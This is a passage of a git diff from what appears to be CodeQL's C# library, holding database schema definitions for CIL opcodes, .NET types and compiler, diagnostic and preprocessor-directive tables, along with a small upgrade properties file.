@cil_stloc_0 +| 11 = @cil_stloc_1 +| 12 = @cil_stloc_2 +| 13 = @cil_stloc_3 +| 14 = @cil_ldarg_s +| 15 = @cil_ldarga_s +| 16 = @cil_starg_s +| 17 = @cil_ldloc_s +| 18 = @cil_ldloca_s +| 19 = @cil_stloc_s +| 20 = @cil_ldnull +| 21 = @cil_ldc_i4_m1 +| 22 = @cil_ldc_i4_0 +| 23 = @cil_ldc_i4_1 +| 24 = @cil_ldc_i4_2 +| 25 = @cil_ldc_i4_3 +| 26 = @cil_ldc_i4_4 +| 27 = @cil_ldc_i4_5 +| 28 = @cil_ldc_i4_6 +| 29 = @cil_ldc_i4_7 +| 30 = @cil_ldc_i4_8 +| 31 = @cil_ldc_i4_s +| 32 = @cil_ldc_i4 +| 33 = @cil_ldc_i8 +| 34 = @cil_ldc_r4 +| 35 = @cil_ldc_r8 +| 37 = @cil_dup +| 38 = @cil_pop +| 39 = @cil_jmp +| 40 = @cil_call +| 41 = @cil_calli +| 42 = @cil_ret +| 43 = @cil_br_s +| 44 = @cil_brfalse_s +| 45 = @cil_brtrue_s +| 46 = @cil_beq_s +| 47 = @cil_bge_s +| 48 = @cil_bgt_s +| 49 = @cil_ble_s +| 50 = @cil_blt_s +| 51 = @cil_bne_un_s +| 52 = @cil_bge_un_s +| 53 = @cil_bgt_un_s +| 54 = @cil_ble_un_s +| 55 = @cil_blt_un_s +| 56 = @cil_br +| 57 = @cil_brfalse +| 58 = @cil_brtrue +| 59 = @cil_beq +| 60 = @cil_bge +| 61 = @cil_bgt +| 62 = @cil_ble +| 63 = @cil_blt +| 64 = @cil_bne_un +| 65 = @cil_bge_un +| 66 = @cil_bgt_un +| 67 = @cil_ble_un +| 68 = @cil_blt_un +| 69 = @cil_switch +| 70 = @cil_ldind_i1 +| 71 = @cil_ldind_u1 +| 72 = @cil_ldind_i2 +| 73 = @cil_ldind_u2 +| 74 = @cil_ldind_i4 +| 75 = @cil_ldind_u4 +| 76 = @cil_ldind_i8 +| 77 = @cil_ldind_i +| 78 = @cil_ldind_r4 +| 79 = @cil_ldind_r8 +| 80 = @cil_ldind_ref +| 81 = @cil_stind_ref +| 82 = @cil_stind_i1 +| 83 = @cil_stind_i2 +| 84 = @cil_stind_i4 +| 85 = @cil_stind_i8 +| 86 = @cil_stind_r4 +| 87 = @cil_stind_r8 +| 88 = @cil_add +| 89 = @cil_sub +| 90 = @cil_mul +| 91 = @cil_div +| 92 = @cil_div_un +| 93 = @cil_rem +| 94 = @cil_rem_un +| 95 = @cil_and +| 96 = @cil_or +| 97 = @cil_xor +| 98 = @cil_shl +| 99 = @cil_shr +| 100 = @cil_shr_un +| 101 = @cil_neg +| 102 = @cil_not +| 103 = @cil_conv_i1 +| 104 = @cil_conv_i2 +| 105 = @cil_conv_i4 +| 106 = @cil_conv_i8 +| 107 = @cil_conv_r4 +| 108 = @cil_conv_r8 +| 109 = @cil_conv_u4 +| 110 = @cil_conv_u8 +| 111 = @cil_callvirt +| 112 = @cil_cpobj +| 113 = @cil_ldobj +| 114 = @cil_ldstr +| 115 = @cil_newobj +| 116 = @cil_castclass +| 117 = @cil_isinst +| 118 = @cil_conv_r_un +| 121 = @cil_unbox +| 122 = @cil_throw +| 123 = @cil_ldfld +| 124 = @cil_ldflda +| 125 = @cil_stfld +| 126 = @cil_ldsfld +| 127 = @cil_ldsflda +| 128 = @cil_stsfld +| 129 = @cil_stobj +| 130 = @cil_conv_ovf_i1_un +| 131 = @cil_conv_ovf_i2_un +| 132 = @cil_conv_ovf_i4_un +| 133 = @cil_conv_ovf_i8_un +| 134 = @cil_conv_ovf_u1_un +| 135 = @cil_conv_ovf_u2_un +| 136 = @cil_conv_ovf_u4_un +| 137 = @cil_conv_ovf_u8_un +| 138 = @cil_conv_ovf_i_un +| 139 = @cil_conv_ovf_u_un +| 140 = @cil_box +| 141 = @cil_newarr +| 142 = @cil_ldlen +| 143 = @cil_ldelema +| 144 = @cil_ldelem_i1 +| 145 = @cil_ldelem_u1 +| 146 = @cil_ldelem_i2 +| 147 = @cil_ldelem_u2 +| 148 = @cil_ldelem_i4 +| 149 = @cil_ldelem_u4 +| 150 = @cil_ldelem_i8 +| 151 = @cil_ldelem_i +| 152 = @cil_ldelem_r4 +| 153 = @cil_ldelem_r8 +| 154 = @cil_ldelem_ref +| 155 = @cil_stelem_i +| 156 = @cil_stelem_i1 +| 157 = @cil_stelem_i2 +| 158 = @cil_stelem_i4 +| 159 = @cil_stelem_i8 +| 160 = @cil_stelem_r4 +| 161 = @cil_stelem_r8 +| 162 = @cil_stelem_ref +| 163 = @cil_ldelem +| 164 = @cil_stelem +| 165 = @cil_unbox_any +| 179 = @cil_conv_ovf_i1 +| 180 = @cil_conv_ovf_u1 +| 181 = @cil_conv_ovf_i2 +| 182 = @cil_conv_ovf_u2 +| 183 = @cil_conv_ovf_i4 +| 184 = @cil_conv_ovf_u4 +| 185 = @cil_conv_ovf_i8 +| 186 = @cil_conv_ovf_u8 +| 194 = @cil_refanyval +| 195 = @cil_ckinfinite +| 198 = @cil_mkrefany +| 208 = @cil_ldtoken +| 209 = @cil_conv_u2 +| 210 = @cil_conv_u1 +| 211 = @cil_conv_i +| 212 = @cil_conv_ovf_i +| 213 = @cil_conv_ovf_u +| 214 = @cil_add_ovf +| 215 = @cil_add_ovf_un +| 216 = @cil_mul_ovf +| 217 = @cil_mul_ovf_un +| 218 = @cil_sub_ovf +| 219 = @cil_sub_ovf_un +| 220 = @cil_endfinally +| 221 = @cil_leave +| 222 = @cil_leave_s +| 223 = @cil_stind_i +| 224 = @cil_conv_u +| 65024 = @cil_arglist +| 65025 = @cil_ceq +| 65026 = @cil_cgt +| 65027 = @cil_cgt_un +| 65028 = @cil_clt +| 65029 = @cil_clt_un +| 65030 = @cil_ldftn +| 65031 = @cil_ldvirtftn +| 65033 = @cil_ldarg +| 65034 = @cil_ldarga +| 65035 = @cil_starg +| 65036 = @cil_ldloc +| 65037 = @cil_ldloca +| 65038 = @cil_stloc +| 65039 = @cil_localloc +| 65041 = @cil_endfilter +| 65042 = @cil_unaligned +| 65043 = @cil_volatile +| 65044 = @cil_tail +| 65045 = @cil_initobj +| 65046 = @cil_constrained +| 65047 = @cil_cpblk +| 65048 = @cil_initblk +| 65050 = @cil_rethrow +| 65052 = @cil_sizeof +| 65053 = @cil_refanytype +| 65054 = @cil_readonly +; + +// CIL ignored instructions + +@cil_ignore = @cil_nop | @cil_break | @cil_volatile | @cil_unaligned; + +// CIL local/parameter/field access + +@cil_ldarg_any = @cil_ldarg_0 | @cil_ldarg_1 | @cil_ldarg_2 | @cil_ldarg_3 | @cil_ldarg_s | @cil_ldarga_s | @cil_ldarg | @cil_ldarga; +@cil_starg_any = @cil_starg | @cil_starg_s; + +@cil_ldloc_any = @cil_ldloc_0 | @cil_ldloc_1 | @cil_ldloc_2 | @cil_ldloc_3 | @cil_ldloc_s | @cil_ldloca_s | @cil_ldloc | @cil_ldloca; +@cil_stloc_any = @cil_stloc_0 | @cil_stloc_1 | @cil_stloc_2 | @cil_stloc_3 | @cil_stloc_s | @cil_stloc; + +@cil_ldfld_any = @cil_ldfld | @cil_ldsfld | @cil_ldsflda | @cil_ldflda; +@cil_stfld_any = @cil_stfld | @cil_stsfld; + +@cil_local_access = @cil_stloc_any | @cil_ldloc_any; +@cil_arg_access = @cil_starg_any | @cil_ldarg_any; +@cil_read_access = @cil_ldloc_any | @cil_ldarg_any | @cil_ldfld_any; +@cil_write_access = @cil_stloc_any | @cil_starg_any | @cil_stfld_any; + +@cil_stack_access = @cil_local_access | @cil_arg_access; +@cil_field_access = @cil_ldfld_any | @cil_stfld_any; + +@cil_access = @cil_read_access | @cil_write_access; + +// CIL constant/literal instructions + +@cil_ldc_i = @cil_ldc_i4_any | @cil_ldc_i8; + +@cil_ldc_i4_any = @cil_ldc_i4_m1 | @cil_ldc_i4_0 | @cil_ldc_i4_1 | @cil_ldc_i4_2 | @cil_ldc_i4_3 | + @cil_ldc_i4_4 | @cil_ldc_i4_5 | @cil_ldc_i4_6 | @cil_ldc_i4_7 | @cil_ldc_i4_8 | @cil_ldc_i4_s | @cil_ldc_i4; + +@cil_ldc_r = @cil_ldc_r4 | @cil_ldc_r8; + +@cil_literal = @cil_ldnull | @cil_ldc_i | @cil_ldc_r | @cil_ldstr; + +// Control flow + +@cil_conditional_jump = @cil_binary_jump | @cil_unary_jump; +@cil_binary_jump = @cil_beq_s | @cil_bge_s | @cil_bgt_s | @cil_ble_s | @cil_blt_s | + @cil_bne_un_s | @cil_bge_un_s | @cil_bgt_un_s | @cil_ble_un_s | @cil_blt_un_s | + @cil_beq | @cil_bge | @cil_bgt | @cil_ble | @cil_blt | + @cil_bne_un | @cil_bge_un | @cil_bgt_un | @cil_ble_un | @cil_blt_un; +@cil_unary_jump = @cil_brfalse_s | @cil_brtrue_s | @cil_brfalse | @cil_brtrue | @cil_switch; +@cil_unconditional_jump = @cil_br | @cil_br_s | @cil_leave_any; +@cil_leave_any = @cil_leave | @cil_leave_s; +@cil_jump = @cil_unconditional_jump | @cil_conditional_jump; + +// CIL call instructions + +@cil_call_any = @cil_jmp | @cil_call | @cil_calli | @cil_tail | @cil_callvirt | @cil_newobj; + +// CIL expression instructions + +@cil_expr = @cil_literal | @cil_binary_expr | @cil_unary_expr | @cil_call_any | @cil_read_access | + @cil_newarr | @cil_ldtoken | @cil_sizeof | + @cil_ldftn | @cil_ldvirtftn | @cil_localloc | @cil_mkrefany | @cil_refanytype | @cil_arglist | @cil_dup; + +@cil_unary_expr = + @cil_conversion_operation | @cil_unary_arithmetic_operation | @cil_unary_bitwise_operation| + @cil_ldlen | @cil_isinst | @cil_box | @cil_ldobj | @cil_castclass | @cil_unbox_any | + @cil_ldind | @cil_unbox; + +@cil_conversion_operation = + @cil_conv_i1 | @cil_conv_i2 | @cil_conv_i4 | @cil_conv_i8 | + @cil_conv_u1 | @cil_conv_u2 | @cil_conv_u4 | @cil_conv_u8 | + @cil_conv_ovf_i | @cil_conv_ovf_i_un | @cil_conv_ovf_i1 | @cil_conv_ovf_i1_un | + @cil_conv_ovf_i2 | @cil_conv_ovf_i2_un | @cil_conv_ovf_i4 | @cil_conv_ovf_i4_un | + @cil_conv_ovf_i8 | @cil_conv_ovf_i8_un | @cil_conv_ovf_u | @cil_conv_ovf_u_un | + @cil_conv_ovf_u1 | @cil_conv_ovf_u1_un | @cil_conv_ovf_u2 | @cil_conv_ovf_u2_un | + @cil_conv_ovf_u4 | @cil_conv_ovf_u4_un | @cil_conv_ovf_u8 | @cil_conv_ovf_u8_un | + @cil_conv_r4 | @cil_conv_r8 | @cil_conv_ovf_u2 | @cil_conv_ovf_u2_un | + @cil_conv_i | @cil_conv_u | @cil_conv_r_un; + +@cil_ldind = @cil_ldind_i | @cil_ldind_i1 | @cil_ldind_i2 | @cil_ldind_i4 | @cil_ldind_i8 | + @cil_ldind_r4 | @cil_ldind_r8 | @cil_ldind_ref | @cil_ldind_u1 | @cil_ldind_u2 | @cil_ldind_u4; + +@cil_stind = @cil_stind_i | @cil_stind_i1 | @cil_stind_i2 | @cil_stind_i4 | @cil_stind_i8 | + @cil_stind_r4 | @cil_stind_r8 | @cil_stind_ref; + +@cil_bitwise_operation = @cil_binary_bitwise_operation | @cil_unary_bitwise_operation; + +@cil_binary_bitwise_operation = @cil_and | @cil_or | @cil_xor | @cil_shr | @cil_shr | @cil_shr_un | @cil_shl; + +@cil_binary_arithmetic_operation = @cil_add | @cil_sub | @cil_mul | @cil_div | @cil_div_un | + @cil_rem | @cil_rem_un | @cil_add_ovf | @cil_add_ovf_un | @cil_mul_ovf | @cil_mul_ovf_un | + @cil_sub_ovf | @cil_sub_ovf_un; + +@cil_unary_bitwise_operation = @cil_not; + +@cil_binary_expr = @cil_binary_arithmetic_operation | @cil_binary_bitwise_operation | @cil_read_array | @cil_comparison_operation; + +@cil_unary_arithmetic_operation = @cil_neg; + +@cil_comparison_operation = @cil_cgt_un | @cil_ceq | @cil_cgt | @cil_clt | @cil_clt_un; + +// Elements that retrieve an address of something +@cil_read_ref = @cil_ldloca_s | @cil_ldarga_s | @cil_ldflda | @cil_ldsflda | @cil_ldelema; + +// CIL array instructions + +@cil_read_array = + @cil_ldelem | @cil_ldelema | @cil_ldelem_i1 | @cil_ldelem_ref | @cil_ldelem_i | + @cil_ldelem_i1 | @cil_ldelem_i2 | @cil_ldelem_i4 | @cil_ldelem_i8 | @cil_ldelem_r4 | + @cil_ldelem_r8 | @cil_ldelem_u1 | @cil_ldelem_u2 | @cil_ldelem_u4; + +@cil_write_array = @cil_stelem | @cil_stelem_ref | + @cil_stelem_i | @cil_stelem_i1 | @cil_stelem_i2 | @cil_stelem_i4 | @cil_stelem_i8 | + @cil_stelem_r4 | @cil_stelem_r8; + +@cil_throw_any = @cil_throw | @cil_rethrow; + +#keyset[impl, index] +cil_instruction( + unique int id: @cil_instruction, + int opcode: int ref, + int index: int ref, + int impl: @cil_method_implementation ref); + +cil_jump( + unique int instruction: @cil_jump ref, + int target: @cil_instruction ref); + +cil_access( + unique int instruction: @cil_instruction ref, + int target: @cil_accessible ref); + +cil_value( + unique int instruction: @cil_literal ref, + string value: string ref); + +#keyset[instruction, index] +cil_switch( + int instruction: @cil_switch ref, + int index: int ref, + int target: @cil_instruction ref); + +cil_instruction_location( + unique int id: @cil_instruction ref, + int loc: @location ref); + +cil_type_location( + int id: @cil_type ref, + int loc: @location ref); + +cil_method_location( + int id: @cil_method ref, + int loc: @location ref); + +@cil_namespace = @namespace; + +@cil_type_container = @cil_type | @cil_namespace | @cil_method; + +case @cil_type.kind of + 0 = @cil_valueorreftype +| 1 = @cil_typeparameter +| 2 = @cil_array_type +| 3 = @cil_pointer_type +| 4 = @cil_function_pointer_type +; + +cil_type( + unique int id: @cil_type, + string name: string ref, + int kind: int ref, + int parent: @cil_type_container ref, + int sourceDecl: @cil_type ref); + +cil_pointer_type( + unique int id: @cil_pointer_type ref, + int pointee: @cil_type ref); + +cil_array_type( + unique int id: @cil_array_type ref, + int element_type: @cil_type ref, + int rank: int ref); + +cil_function_pointer_return_type( + unique int id: @cil_function_pointer_type ref, + int return_type: @cil_type ref); + +cil_method( + unique int id: @cil_method, + string name: string ref, + int parent: @cil_type ref, + int return_type: @cil_type ref); + +cil_method_source_declaration( + unique int method: @cil_method ref, + int source: @cil_method ref); + +cil_method_implementation( + unique int id: @cil_method_implementation, + int method: @cil_method ref, + int location: @assembly ref); + +cil_implements( + int id: @cil_method ref, + int decl: @cil_method ref); + +#keyset[parent, name] +cil_field( + unique int id: @cil_field, + int parent: @cil_type ref, + string name: string ref, + int field_type: @cil_type ref); + +@cil_element = @cil_instruction | @cil_declaration | @cil_handler | @cil_attribute | @cil_namespace; +@cil_named_element = @cil_declaration | @cil_namespace; +@cil_declaration = @cil_variable | @cil_method | @cil_type | @cil_member; +@cil_accessible = @cil_declaration; +@cil_variable = @cil_field | @cil_stack_variable; +@cil_stack_variable = @cil_local_variable | @cil_parameter; +@cil_member = @cil_method | @cil_type | @cil_field | @cil_property | @cil_event; +@cil_custom_modifier_receiver = @cil_method | @cil_property | @cil_parameter | @cil_field | @cil_function_pointer_type; +@cil_parameterizable = @cil_method | @cil_function_pointer_type; +@cil_has_type_annotation = @cil_stack_variable | @cil_property | @cil_method | @cil_function_pointer_type; + +#keyset[parameterizable, index] +cil_parameter( + unique int id: @cil_parameter, + int parameterizable: @cil_parameterizable ref, + int index: int ref, + int param_type: @cil_type ref); + +cil_parameter_in(unique int id: @cil_parameter ref); +cil_parameter_out(unique int id: @cil_parameter ref); + +cil_setter(unique int prop: @cil_property ref, + int method: @cil_method ref); + +#keyset[id, modifier] +cil_custom_modifiers( + int id: @cil_custom_modifier_receiver ref, + int modifier: @cil_type ref, + int kind: int ref); // modreq: 1, modopt: 0 + +cil_type_annotation( + int id: @cil_has_type_annotation ref, + int annotation: int ref); + +cil_getter(unique int prop: @cil_property ref, + int method: @cil_method ref); + +cil_adder(unique int event: @cil_event ref, + int method: @cil_method ref); + +cil_remover(unique int event: @cil_event ref, int method: @cil_method ref); + +cil_raiser(unique int event: @cil_event ref, int method: @cil_method ref); + +cil_property( + unique int id: @cil_property, + int parent: @cil_type ref, + string name: string ref, + int property_type: @cil_type ref); + +#keyset[parent, name] +cil_event(unique int id: @cil_event, + int parent: @cil_type ref, + string name: string ref, + int event_type: @cil_type ref); + +#keyset[impl, index] +cil_local_variable( + unique int id: @cil_local_variable, + int impl: @cil_method_implementation ref, + int index: int ref, + int var_type: @cil_type ref); + +cil_function_pointer_calling_conventions( + int id: @cil_function_pointer_type ref, + int kind: int ref); + +// CIL handlers (exception handlers etc). + +case @cil_handler.kind of + 0 = @cil_catch_handler +| 1 = @cil_filter_handler +| 2 = @cil_finally_handler +| 4 = @cil_fault_handler +; + +#keyset[impl, index] +cil_handler( + unique int id: @cil_handler, + int impl: @cil_method_implementation ref, + int index: int ref, + int kind: int ref, + int try_start: @cil_instruction ref, + int try_end: @cil_instruction ref, + int handler_start: @cil_instruction ref); + +cil_handler_filter( + unique int id: @cil_handler ref, + int filter_start: @cil_instruction ref); + +cil_handler_type( + unique int id: @cil_handler ref, + int catch_type: @cil_type ref); + +@cil_controlflow_node = @cil_entry_point | @cil_instruction; + +@cil_entry_point = @cil_method_implementation | @cil_handler; + +@cil_dataflow_node = @cil_instruction | @cil_variable | @cil_method; + +cil_method_stack_size( + unique int method: @cil_method_implementation ref, + int size: int ref); + +// CIL modifiers + +cil_public(int id: @cil_member ref); +cil_private(int id: @cil_member ref); +cil_protected(int id: @cil_member ref); +cil_internal(int id: @cil_member ref); +cil_static(int id: @cil_member ref); +cil_sealed(int id: @cil_member ref); +cil_virtual(int id: @cil_method ref); +cil_abstract(int id: @cil_member ref); +cil_class(int id: @cil_type ref); +cil_interface(int id: @cil_type ref); +cil_security(int id: @cil_member ref); +cil_requiresecobject(int id: @cil_method ref); +cil_specialname(int id: @cil_method ref); +cil_newslot(int id: @cil_method ref); + +cil_base_class(unique int id: @cil_type ref, int base: @cil_type ref); +cil_base_interface(int id: @cil_type ref, int base: @cil_type ref); +cil_enum_underlying_type(unique int id: @cil_type ref, int underlying: @cil_type ref); + +#keyset[unbound, index] +cil_type_parameter( + int unbound: @cil_member ref, + int index: int ref, + int param: @cil_typeparameter ref); + +#keyset[bound, index] +cil_type_argument( + int bound: @cil_member ref, + int index: int ref, + int t: @cil_type ref); + +// CIL type parameter constraints + +cil_typeparam_covariant(int tp: @cil_typeparameter ref); +cil_typeparam_contravariant(int tp: @cil_typeparameter ref); +cil_typeparam_class(int tp: @cil_typeparameter ref); +cil_typeparam_struct(int tp: @cil_typeparameter ref); +cil_typeparam_new(int tp: @cil_typeparameter ref); +cil_typeparam_constraint(int tp: @cil_typeparameter ref, int supertype: @cil_type ref); + +// CIL attributes + +cil_attribute( + unique int attributeid: @cil_attribute, + int element: @cil_declaration ref, + int constructor: @cil_method ref); + +#keyset[attribute_id, param] +cil_attribute_named_argument( + int attribute_id: @cil_attribute ref, + string param: string ref, + string value: string ref); + +#keyset[attribute_id, index] +cil_attribute_positional_argument( + int attribute_id: @cil_attribute ref, + int index: int ref, + string value: string ref); + + +// Common .Net data model covering both C# and CIL + +// Common elements +@dotnet_element = @element | @cil_element; +@dotnet_named_element = @named_element | @cil_named_element; +@dotnet_callable = @callable | @cil_method; +@dotnet_variable = @variable | @cil_variable; +@dotnet_field = @field | @cil_field; +@dotnet_parameter = @parameter | @cil_parameter; +@dotnet_declaration = @declaration | @cil_declaration; +@dotnet_member = @member | @cil_member; +@dotnet_event = @event | @cil_event; +@dotnet_property = @property | @cil_property | @indexer; +@dotnet_parameterizable = @parameterizable | @cil_parameterizable; + +// Common types +@dotnet_type = @type | @cil_type; +@dotnet_call = @call | @cil_call_any; +@dotnet_throw = @throw_element | @cil_throw_any; +@dotnet_valueorreftype = @cil_valueorreftype | @value_or_ref_type | @cil_array_type | @void_type; +@dotnet_typeparameter = @type_parameter | @cil_typeparameter; +@dotnet_array_type = @array_type | @cil_array_type; +@dotnet_pointer_type = @pointer_type | @cil_pointer_type; +@dotnet_type_parameter = @type_parameter | @cil_typeparameter; +@dotnet_generic = @dotnet_valueorreftype | @dotnet_callable; + +// Attributes +@dotnet_attribute = @attribute | @cil_attribute; + +// Expressions +@dotnet_expr = @expr | @cil_expr; + +// Literals +@dotnet_literal = @literal_expr | @cil_literal; +@dotnet_string_literal = @string_literal_expr | @cil_ldstr; +@dotnet_int_literal = @integer_literal_expr | @cil_ldc_i; +@dotnet_float_literal = @float_literal_expr | @cil_ldc_r; +@dotnet_null_literal = @null_literal_expr | @cil_ldnull; + +@metadata_entity = @cil_method | @cil_type | @cil_field | @cil_property | @field | @property | + @callable | @value_or_ref_type | @void_type; + +#keyset[entity, location] +metadata_handle(int entity : @metadata_entity ref, int location: @assembly ref, int handle: int ref) diff --git a/csharp/downgrades/1136957c0b3c73a7798ae42645c361e813295393/upgrade.properties b/csharp/downgrades/1136957c0b3c73a7798ae42645c361e813295393/upgrade.properties new file mode 100644 index 00000000000..b451dc684ba --- /dev/null +++ b/csharp/downgrades/1136957c0b3c73a7798ae42645c361e813295393/upgrade.properties @@ -0,0 +1,2 @@ +description: Remove operators from the virtualizable type. +compatibility: full \ No newline at end of file diff --git a/csharp/ql/lib/upgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/old.dbscheme b/csharp/ql/lib/upgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/old.dbscheme new file mode 100644 index 00000000000..d0fba103f7d --- /dev/null +++ b/csharp/ql/lib/upgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/old.dbscheme @@ -0,0 +1,2069 @@ +/* This is a dummy line to alter the dbscheme, so we can make a database upgrade + * without actually changing any of the dbscheme predicates. It contains a date + * to allow for such updates in the future as well. + * + * 2021-07-14 + * + * DO NOT remove this comment carelessly, since it can revert the dbscheme back to a + * previously seen state (matching a previously seen SHA), which would make the upgrade + * mechanism not work properly. + */ + +/** + * An invocation of the compiler. Note that more than one file may be + * compiled per invocation. For example, this command compiles three + * source files: + * + * csc f1.cs f2.cs f3.cs + * + * The `id` simply identifies the invocation, while `cwd` is the working + * directory from which the compiler was invoked. + */ +compilations( + unique int id : @compilation, + string cwd : string ref +); + +/** + * The arguments that were passed to the extractor for a compiler + * invocation. If `id` is for the compiler invocation + * + * csc f1.cs f2.cs f3.cs + * + * then typically there will be rows for + * + * num | arg + * --- | --- + * 0 | --compiler + * 1 | *path to compiler* + * 2 | f1.cs + * 3 | f2.cs + * 4 | f3.cs + */ +#keyset[id, num] +compilation_args( + int id : @compilation ref, + int num : int ref, + string arg : string ref +); + +/** + * The source files that are compiled by a compiler invocation. + * If `id` is for the compiler invocation + * + * csc f1.cs f2.cs f3.cs + * + * then there will be rows for + * + * num | arg + * --- | --- + * 0 | f1.cs + * 1 | f2.cs + * 2 | f3.cs + */ +#keyset[id, num] +compilation_compiling_files( + int id : @compilation ref, + int num : int ref, + int file : @file ref +); + +/** + * The references used by a compiler invocation. + * If `id` is for the compiler invocation + * + * csc f1.cs f2.cs f3.cs /r:ref1.dll /r:ref2.dll /r:ref3.dll + * + * then there will be rows for + * + * num | arg + * --- | --- + * 0 | ref1.dll + * 1 | ref2.dll + * 2 | ref3.dll + */ +#keyset[id, num] +compilation_referencing_files( + int id : @compilation ref, + int num : int ref, + int file : @file ref +); + +/** + * The time taken by the extractor for a compiler invocation. + * + * For each file `num`, there will be rows for + * + * kind | seconds + * ---- | --- + * 1 | CPU seconds used by the extractor frontend + * 2 | Elapsed seconds during the extractor frontend + * 3 | CPU seconds used by the extractor backend + * 4 | Elapsed seconds during the extractor backend + */ +#keyset[id, num, kind] +compilation_time( + int id : @compilation ref, + int num : int ref, + /* kind: + 1 = frontend_cpu_seconds + 2 = frontend_elapsed_seconds + 3 = extractor_cpu_seconds + 4 = extractor_elapsed_seconds + */ + int kind : int ref, + float seconds : float ref +); + +/** + * An error or warning generated by the extractor. + * The diagnostic message `diagnostic` was generated during compiler + * invocation `compilation`, and is the `file_number_diagnostic_number`th + * message generated while extracting the `file_number`th file of that + * invocation. + */ +#keyset[compilation, file_number, file_number_diagnostic_number] +diagnostic_for( + unique int diagnostic : @diagnostic ref, + int compilation : @compilation ref, + int file_number : int ref, + int file_number_diagnostic_number : int ref +); + +diagnostics( + unique int id: @diagnostic, + int severity: int ref, + string error_tag: string ref, + string error_message: string ref, + string full_error_message: string ref, + int location: @location_default ref +); + +extractor_messages( + unique int id: @extractor_message, + int severity: int ref, + string origin : string ref, + string text : string ref, + string entity : string ref, + int location: @location_default ref, + string stack_trace : string ref +); + +/** + * If extraction was successful, then `cpu_seconds` and + * `elapsed_seconds` are the CPU time and elapsed time (respectively) + * that extraction took for compiler invocation `id`. + */ +compilation_finished( + unique int id : @compilation ref, + float cpu_seconds : float ref, + float elapsed_seconds : float ref +); + +compilation_assembly( + unique int id : @compilation ref, + int assembly: @assembly ref +) + +// Populated by the CSV extractor +externalData( + int id: @externalDataElement, + string path: string ref, + int column: int ref, + string value: string ref); + +sourceLocationPrefix( + string prefix: string ref); + +/* + * C# dbscheme + */ + +/** ELEMENTS **/ + +@element = @declaration | @stmt | @expr | @modifier | @attribute | @namespace_declaration + | @using_directive | @type_parameter_constraints | @externalDataElement + | @xmllocatable | @asp_element | @namespace | @preprocessor_directive; + +@declaration = @callable | @generic | @assignable | @namespace; + +@named_element = @namespace | @declaration; + +@declaration_with_accessors = @property | @indexer | @event; + +@assignable = @variable | @assignable_with_accessors | @event; + +@assignable_with_accessors = @property | @indexer; + +@attributable = @assembly | @field | @parameter | @operator | @method | @constructor + | @destructor | @callable_accessor | @value_or_ref_type | @declaration_with_accessors + | @local_function | @lambda_expr; + +/** LOCATIONS, ASEMMBLIES, MODULES, FILES and FOLDERS **/ + +@location = @location_default | @assembly; + +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref); + +locations_mapped( + unique int id: @location_default ref, + int mapped_to: @location_default ref); + +@sourceline = @file | @callable | @xmllocatable; + +numlines( + int element_id: @sourceline ref, + int num_lines: int ref, + int num_code: int ref, + int num_comment: int ref); + +assemblies( + unique int id: @assembly, + int file: @file ref, + string fullname: string ref, + string name: string ref, + string version: string ref); + +files( + unique int id: @file, + string name: string ref); + +folders( + unique int id: @folder, + string name: string ref); + +@container = @folder | @file ; + +containerparent( + int parent: @container ref, + unique int child: @container ref); + +file_extraction_mode( + unique int file: @file ref, + int mode: int ref + /* 0 = normal, 1 = standalone extractor */ + ); + +/** NAMESPACES **/ + +@type_container = @namespace | @type; + +namespaces( + unique int id: @namespace, + string name: string ref); + +namespace_declarations( + unique int id: @namespace_declaration, + int namespace_id: @namespace ref); + +namespace_declaration_location( + unique int id: @namespace_declaration ref, + int loc: @location ref); + +parent_namespace( + unique int child_id: @type_container ref, + int namespace_id: @namespace ref); + +@declaration_or_directive = @namespace_declaration | @type | @using_directive; + +parent_namespace_declaration( + int child_id: @declaration_or_directive ref, // cannot be unique because of partial classes + int namespace_id: @namespace_declaration ref); + +@using_directive = @using_namespace_directive | @using_static_directive; + +using_global( + unique int id: @using_directive ref +); + +using_namespace_directives( + unique int id: @using_namespace_directive, + int namespace_id: @namespace ref); + +using_static_directives( + unique int id: @using_static_directive, + int type_id: @type_or_ref ref); + +using_directive_location( + unique int id: @using_directive ref, + int loc: @location ref); + +@preprocessor_directive = @pragma_warning | @pragma_checksum | @directive_define | @directive_undefine | @directive_warning + | @directive_error | @directive_nullable | @directive_line | @directive_region | @directive_endregion | @directive_if + | @directive_elif | @directive_else | @directive_endif; + +@conditional_directive = @directive_if | @directive_elif; +@branch_directive = @directive_if | @directive_elif | @directive_else; + +directive_ifs( + unique int id: @directive_if, + int branchTaken: int ref, /* 0: false, 1: true */ + int conditionValue: int ref); /* 0: false, 1: true */ + +directive_elifs( + unique int id: @directive_elif, + int branchTaken: int ref, /* 0: false, 1: true */ + int conditionValue: int ref, /* 0: false, 1: true */ + int parent: @directive_if ref, + int index: int ref); + +directive_elses( + unique int id: @directive_else, + int branchTaken: int ref, /* 0: false, 1: true */ + int parent: @directive_if ref, + int index: int ref); + +#keyset[id, start] +directive_endifs( + unique int id: @directive_endif, + unique int start: @directive_if ref); + +directive_define_symbols( + unique int id: @define_symbol_expr ref, + string name: string ref); + +directive_regions( + unique int id: @directive_region, + string name: string ref); + +#keyset[id, start] +directive_endregions( + unique int id: @directive_endregion, + unique int start: @directive_region ref); + +directive_lines( + unique int id: @directive_line, + int kind: int ref); /* 0: default, 1: hidden, 2: numeric, 3: span */ + +directive_line_value( + unique int id: @directive_line ref, + int line: int ref); + +directive_line_file( + unique int id: @directive_line ref, + int file: @file ref); + +directive_line_offset( + unique int id: @directive_line ref, + int offset: int ref); + +directive_line_span( + unique int id: @directive_line ref, + int startLine: int ref, + int startColumn: int ref, + int endLine: int ref, + int endColumn: int ref); + +directive_nullables( + unique int id: @directive_nullable, + int setting: int ref, /* 0: disable, 1: enable, 2: restore */ + int target: int ref); /* 0: none, 1: annotations, 2: warnings */ + +directive_warnings( + unique int id: @directive_warning, + string message: string ref); + +directive_errors( + unique int id: @directive_error, + string message: string ref); + +directive_undefines( + unique int id: @directive_undefine, + string name: string ref); + +directive_defines( + unique int id: @directive_define, + string name: string ref); + +pragma_checksums( + unique int id: @pragma_checksum, + int file: @file ref, + string guid: string ref, + string bytes: string ref); + +pragma_warnings( + unique int id: @pragma_warning, + int kind: int ref /* 0 = disable, 1 = restore */); + +#keyset[id, index] +pragma_warning_error_codes( + int id: @pragma_warning ref, + string errorCode: string ref, + int 